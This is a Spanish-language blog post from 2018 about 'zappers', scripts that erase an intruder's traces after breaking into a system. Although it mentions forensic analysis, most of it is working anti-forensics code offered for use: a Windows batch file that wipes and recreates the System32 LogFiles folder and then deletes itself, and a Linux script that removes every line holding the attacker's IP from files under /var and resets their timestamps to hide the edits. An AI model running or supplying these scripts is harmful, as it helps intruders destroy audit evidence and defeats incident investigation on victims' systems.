Ocultando Huellas: Zappers

Mucho se habla en internet sobre el como ingresar a un sistema de manera “no autorizada”, hay cientos de guías que te detallan paso a paso como explotar ciertas vulnerabilidades del algun producto o tecnología hasta entrar al sistema, pero ¿que hay una vez que entras?, ¿que hay sobre todos los rastros y huellas que vas dejando al momento de entrar?, ¿donde quedan esos registros?, etc.

¿Qué son los Zappers?

Los Zappers son herramientas automatizadas para el borrado de huellas en algún sistema, existen zappers para los principales sistemas operativos, en su mayoria scripts que el usuario puede customizar según sus necesidades.

Para entender donde buscar si te toca hacer un analisis forense de algún incidente de seguridad es muy importante conocer todos estos lugares donde quedan regisros de acceso o de intentos de acceso, registros de comandos ejecutados, registros de eventos, de url consultadas, memorias caches del sistema, archivos temporales, etc.

Ejemplos de algunos Zappers:

Windows:

Zapper sencillo en BAT:

@echo off
rd /s /q %systemroot%\Windows\System32\LogFiles
md %systemroot%\Windows\System32\LogFiles
del /f /q %0
exit

Fuente: http://underc0deblog.blogspot.cl/2014/03/zapper-para-windows-batch.html

Winzapper:
winzap
Fuente: http://ntsecurity.nu/toolbox/winzapper/

Linux:

#!/bin/sh
#
############################################################################
# "adk.sh v0.1" hecho por el ..sR. aDiKtO.. <[email protected]>
#
# Este script borra todas las lineas de todos los archivos
# que esten en /var que contengan tu ip, conservando la fecha
# de antes de la modificacion .
#
# Este script se distribuye segun la licencia GPL v.2 o posteriores y
# no tiene garantias de ningun tipo. Puede obtener una copia de la
# licencia GPL o ponerse en contacto con la Free Software
# Foundation en http://www.gnu.org
############################################################################
#
# Variable que contiene tu ip
IP="127.0.0.1"
############################################################################
# Funcion encargada de limpiar todos los logs
############################################################################
function main()
{
mkdir -p /tmp/.adk &>/dev/null
for i in `find /var 2>/dev/null`
do
  linea=$(cat $i 2>/dev/null | grep $IP )
  if [ "$linea" != "" ]
  then
      ls -l $i > /tmp/.adk/fecha 2>/dev/null
      aux=$(awk '{ print $6 $7 }' /tmp/.adk/fecha 2>/dev/null)
      TIEMPO=$(echo $aux | tr "-:" "\000" 2>/dev/null)
      sed "/$IP/d" $i > /tmp/.adk/datos 2>/dev/null
      cat /tmp/.adk/datos > $i 2>/dev/null
      touch -t $TIEMPO $i 2>/dev/null
      echo -e "IP limpiada del archivo $i"
  fi
done
rm -rf /tmp/.adk &>/dev/null
}
############################################################################
#Funcion principal
############################################################################
clear
echo -e "\n    \033[40m\033[1;37m  adk.sh v0.1  \033[0m\n"
if [ $GROUPS != 0 ]
then
  echo -e "ERROR: Necesitas tener privilegios de root para poder ejecutar este script"
  exit
fi
echo -e "\n Empecemos a borrar tu ip de los log de este sistema.\n"
main
echo -e "\n Ordenador Limpiado Completamente"

Fuente: https://foro.elhacker.net/hacking_basico/un_buen_zapper-t26710.0.html

Written on September 5, 2018